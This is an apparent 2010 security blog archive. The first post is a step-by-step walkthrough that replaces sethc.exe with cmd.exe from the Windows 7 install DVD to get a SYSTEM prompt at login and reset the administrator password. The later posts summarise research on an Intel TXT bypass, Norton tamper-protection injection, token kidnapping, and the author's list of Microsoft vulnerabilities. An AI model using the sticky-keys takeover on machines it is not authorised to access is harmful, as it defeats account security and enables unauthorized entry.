Saturday, February 20, 2010

Hack windows 7 with its own bootable installation dvd

hack windows 7 with its own installation dvd

first boot from same installation windows 7 from which you have already installed windows 7 in your computer and wait for screen as given below

click on repair your windows option given left hand below windows,it will search for installed windows on your computer

after finish searching installed windows following windows open as given abow

click on next to continue if it continue in system repair mode then you have to cancel the repair windows and wait for following screen as given below to come otherwise it will come automatically when you click next to continue
,the following screen appears next

click on command prompt to bring the command prompt windows, it will start with system privilege

check here which is by default installation drive

by default it is c: if drive letter is different from c: then change drive letter according to your drive letter in the following command

so you have to type the following command

copy c:\windows\system32\cmd.exe
copy c:\windows\system32\sethc.exe

ren sethc.exe sethc2.exe

ren cmd.exe sethc.exe
copy sethc.exe c:\windows\system32\sethc.exe

it will are you sure want to replace the file press y and enter to continue

now restart your computer,and remove your windows installation dvd from dvd rom

now boot up your computer and wait your login screen to come,

presss shift key 5 times on your windows login screen it will bring cmd.exe command prompt with system privilege

now change your administrator password using the following command

net user administrator vikash

the password will change to vikash now logon with administrator with this password you can change the password of other users

Saturday, January 30, 2010

Another TXT Attack
Earlier this year our team has presented an attack against Intel TXT that exploited a design problem with SMM mode being over privileged on PC platforms and able to interfere with the SENTER instruction. The Intel response was two-fold: to patch the SMM implementation bugs we used for the attack (this patch was for both the NVACPI SMM attacks, as well as for the SMM caching attack), and also to start (intensify?) working on STM specification, that is, we heard, planned to be published sometime in the near future. STM is a thin hypervisor concept that is supposed to provide protection against (potentially) malicious SMMs.

Today we present a totally different attack that allows an attacker to trick the SENTER instruction into misconfiguring the VT-d engine, so that it doesn’t protect the newly loaded hypervisor or kernel. This attack exploits an implementation flaw in a SINIT AC module. This new attack also allows for full TXT circumvention, using a software-only attack. This attack doesn't require any SMM bugs to succeed and is totally independent from the previous one.

The press release is here.

The full paper is here.

The advisory published by Intel today can be found here.


Bypassing Norton Antivirus "Product Tamper Protection"

What's Norton Product Tamper Protection? It's a security setting on Norton Antivirus that "Lets you protect your Norton product from an attack or modification by unknown, suspicious, or threatening applications", the option is enabled by default. Basically it protects NAV processes so other processes can't access them (debug, inject code, modify thread execution, etc.), it doesn't matter that current user has permission on them he won't be able to access Norton Antivirus processes.

Without doing much research I guess NAV intercepts Native API calls and return access denied when trying to open a NAV process or thread with dangerous access options. The problem is that NAV forgot to also protect other process objects such as shared sections, LPC ports, etc., so an attacker can put code in a shared section and then make the process jump to the injected code, lets see how to do it.

Injecting and running code on NAV GUI process:
When pressing F1 or accessing NAV GUI help, Windows HTML Help is loaded, NAV GUI process uses HTML Help ActiveX so no new process is created. When the HTML Help is loaded a shared section named \BaseNamedObjects\DfSharedHeapXXXXXX (where XXXXXX are hex numbers) is created, this particular shared section is related with a vulnerability I found long time ago ( where besides the shared section being created on user process it was also created in a privileged process under certain circumstances, this shared section has pointers saved so it was possible to overwrite them and make the process to execute arbitrary code elevating privileges ( Microsoft fixed this issue ( by avoiding the creation of the shared section on privileged processes, so there isn't elevation of privileges anymore but you still can overwrite the data in the shared section of course you will only be able to execute code in a process you already own, but in this case this issue can be used to bypass NAV process protection since you will be able to modify NAV GUI process and run arbitrary code inside it.

This is not big deal but it shows that sometimes some protections are useless when they are not properly audited and a simple and known issue can be used to bypass them.

Antivirus, antivirus, antivirus...

My last post was about a bug in an antivirus product, not big deal, all software has bugs.
I was kindly pointed to this article by Ryan Naraine, it's about an incident were one of my token kidnapping exploits was used, it's a weird feeling to know that some tool of yours was used in an attack but in the end it's not about the tools it's about the user, the intention, etc. anyways, what really surprized me was that no antivirus is detecting the exploits!!! we all know that antivirus suck but not being able to detect a very old exploit with signature analysis that really sucks.

Opening Intranets to attacks by using Internet Explorer

I just released a whitepaper titled: Opening Intranets to attacks by using Internet Explorer, I hope you find it interesting, you can find it here

Token Kidnapping's Revenge

Finally I got some free time to take a look at Windows for security issues, I was initialy amazed with Windows 7 and Windows 2008 R2 they looked really solid but after some time I started to find some issues.
These issues are not really dangerous (depending on the scenario) but allow to continue exploiting Windows using a new attack vector to perform Token Kidnapping ( .
Don't get me wrong MS properly fixed the issues ( detailed in Token Kidnapping presentation but they didn't find/fix all the attack vectors.
With this new attack vector it's still possible to elevate privileges to Local System account from almost any process that has impersonation rights bypassing new Windows services protections such as Per service SID, Write restricted token, etc
Probably I will be presenting the findings at Hackers to Hackers Conference in Brazil ( in a couple of weeks.

8 years hacking Microsoft stuff, +50 vulnerabilities found

2009 is ending and I thought it would be nice to write down my personal record on Microsoft vulnerabilities. I started finding vulns in MS products in 2002 and these are most of them:

-Microsoft Biztalk Server ISAPI HTTP Receive function buffer overflow
-Microsoft Biztalk Server DTA vulnerable to SQL injection

-Microsoft Commerce Server 2002 Weak Registry Key Permissions Weakness

-Microsoft Active Server Pages Cookie Retrieval Issue

-Microsoft Windows LPC heap overflow

-Microsoft Windows Utility Manager Local Elevation of Privileges

-Microsoft Windows Utility Manager Local Elevation of Privileges II

-Microsoft Windows Improper Token Validation

-Microsoft Windows GDI Kernel Local Privilege Escalation Vulnerability

-Microsoft MSDTC COM+ Remote Code Execution Vulnerability

-Microsoft Windows 2000 TroubleShooter ActiveX Control Buffer Overflow Vulnerability

-Microsoft Windows COM Structured Storage Local Privilege Escalation Vulnerability

-Microsoft Windows Thread Pool ACL Local Privilege Escalation Vulnerability
-Microsoft Windows RPCSS Service Isolation Local Privilege Escalation Vulnerability
-Microsoft Windows MSDTC Service Isolation Vulnerability
-Microsoft Windows WMI Service Isolation Local Privilege Escalation Vulnerability

-Microsoft Windows Shell Could Allow Remote Code Execution (2 vulns)

-Microsoft SQL Server Heterogenous Queries Buffer Overflow

-Microsoft SQL Server xp_dirtree Buffer Overflow

-Microsoft SQL Server Buffer Overflows in numerous extended stored procedures (17 vulns)

-Microsoft SQL Server encoded password written by service pack

-Microsoft SQL Server BULK INSERT buffer overflow

-Microsoft SQL Server multiple buffer overflows in DBCC and SQL Injections (6 vulns)

-Microsoft SQL Server multiple vulnerabilities (5 vulns)


If you count them, they are 50 vulnerabilities in total, 14 are Microsoft Windows specific. Actually the real count should be +50, few not mentioned vulnerabilities were patched in service packs, new versions, not acknoledged by MS as vulnerabilities, etc.
Of course I'm not mentioning there the 0days I have, with them the count is >50, reaching 20 specific to MS Windows.

Microsoft should give me a prize someday ;)